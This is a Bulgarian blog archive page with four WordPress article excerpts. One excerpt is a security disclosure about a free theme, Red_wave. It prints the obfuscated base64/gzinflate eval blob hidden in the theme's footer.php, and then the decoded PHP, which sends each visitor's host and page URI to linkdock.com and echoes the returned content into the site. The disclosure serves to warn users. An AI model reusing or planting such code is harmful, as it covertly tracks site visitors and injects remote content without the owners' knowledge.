Публикувано в (Софтуер) от Георги Стефанов на 19 декември 2009 в 18:41
Както сигурно вече си видял днес излезе новата версия на WP 2.9. "Хубавото си е хубаво..." и не мога да не му обърна внимание.

Какво е новото?

1. Най-впечатляваща за мен е функцията, която превръща всяка връзка към видео в плеър при преглед на публикацията. Така, за да вмъкнеш видео в статия не ти трябва нищо повече освен да напишеш връзката към клипа на нов ред в редактора на статии. След като публикуваш или на предварителен преглед тази връзка ще се превърне в кутия плеър за преглед на филмчето. Като гледам HTML кода връзката се заменя с embed таг включен в object таг и като резултат страницата няма да минава проверката на валидатора за валиден XHTML. Така, че от SEO гледна точка имаме проблем. Виж повече информация за проблема и за… прочети цялата статия»


Публикувано в (SEO) от gan на 12 октомври 2009 в 20:11
Преди малко открих бъг в Wordpress 2.8.4 (последната версия в момента).

Грешка

Докато за пореден път актуализирах любимата си статия Популяризиране на сайт с външни връзки, открих следния неприятен ефект - в админ панела при промяна на публикация визуалния редактор спира да зарежда текста и в долния десен ъгъл изчезна грапавото ъгълче за разтягане на полето с текста на публикацията. Така единствено в режим на HTML може да се промени статията.

Проучване

Разгледах внимателно цялата страница и забелязах, че страницата не се е заредила до края и не показва предишните версии на публикацията. В долния край на страницата има списък с предишни версии на публикацията, които се увеличават при всяка промяна на статията. Веднага след заглавието на списъка "Версии на публикацията" страницата завършваше. Разгледах други публикации от блога, но там нямаше… прочети цялата статия»


Публикувано в (Сигурност, Уеб програмиране) от gan на 16 август 2009 в 15:52

Код за проследяване

Пиша тази статия за всички ползващи Wordpress, които не обичат да ги следят без тяхно знание. Проблем: Безплатна тема за Wordpress с име Red_wave от автор AskGraphics се разпространява свободно на сайта http://wordpresstemplates.name, но открих, че съдържа във файла footer.php следния обфускиран PHP код: <? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+ X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5 K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNS Se/o3KiJhSMq1Fk6i5rCV1llGS6mAHub2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqmodSM0h5p4 HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?> (Всичко това е на един ред). Което всъщност представлява следния зашифрован PHP код за проследяване: error_reporting(0); $CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"]) ."&uri=".urlencode($_SERVER["REQUEST_URI"]); if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL); } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content); } elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } Както се вижда този скрипт изпраща до сървъра linkdock.com не само името на вашия домейн, а и точната страница, която в момента отваря посетителя.

Защо го правят?

С този код получават… прочети цялата статия»


Публикувано в (Софтуер) от gan на 24 април 2009 в 00:49
Това е един плъгин за Wordpress, който автоматично добавя след всяка публикация бутончета, с които статията се изпраща за добавяне в известни сайтове за споделяне на линкове (Social bookmark). По този начин получаваш външни линкове към твоя сайт. Връзките от piron.bg и dao.bg са реални. Останалите сайтове дават редирект. Може да тестваш плъгина като използваш бутончетата под тази статия. Трябва да имаш регистрация в сайта, в който добавяш връзката. Обикновено при опит да добавиш връзка първо се отваря логин форма и след като се логнеш в сайта на социалната мрежа се извършва автоматично пренасочване и попадаш в страницата за добавяне на линк. В сайта piron.bg (и някои други) автоматично са попълнени полетата с описание на линка и това прави добавянето бързо. За съжаление това не е така в сайта на dao.bg. Тук ще… прочети цялата статия»